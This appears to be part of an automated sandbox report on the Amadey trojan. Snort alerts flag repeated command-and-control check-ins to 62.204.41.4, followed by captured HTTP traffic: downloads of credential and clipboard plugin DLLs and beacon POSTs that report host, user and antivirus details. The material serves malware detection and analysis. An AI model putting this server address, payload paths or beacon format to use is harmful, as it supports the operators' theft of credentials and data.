                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49841 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49842 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49843 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49844 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49845 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49846 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49847 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49848 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49849 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49850 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49851 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49852 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49853 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49854 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49855 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49856 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49857 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49858 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49859 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49860 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49861 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49862 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49863 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49864 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49865 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49866 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49867 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49868 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49869 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49870 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49871 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49872 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49873 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49874 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49875 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49876 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49877 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49878 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49879 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49880 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49881 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49882 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49883 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49884 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49885 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49886 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49887 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49888 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49889 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49890 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49891 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49892 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49893 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49894 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49895 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49896 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49897 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49898 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49899 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49900 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49901 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49902 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49903 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49904 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49905 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49906 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49907 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49908 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49909 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49910 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49911 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49912 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49913 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49914 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49915 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49916 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49917 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49918 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49919 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49920 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49921 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49922 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49923 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49924 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49925 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49926 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49927 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49928 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49929 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49930 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49931 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49932 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49933 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49934 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49935 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49936 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49937 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49938 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49939 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49940 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49941 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49942 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49943 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49944 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49945 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49946 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49947 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49948 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49949 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49950 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49951 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49952 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49953 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49954 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49955 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49956 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49957 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49958 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49959 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49960 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49961 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49962 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49963 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49964 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49965 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49966 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49967 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49968 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49969 -> 62.204.41.4:80
                            Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
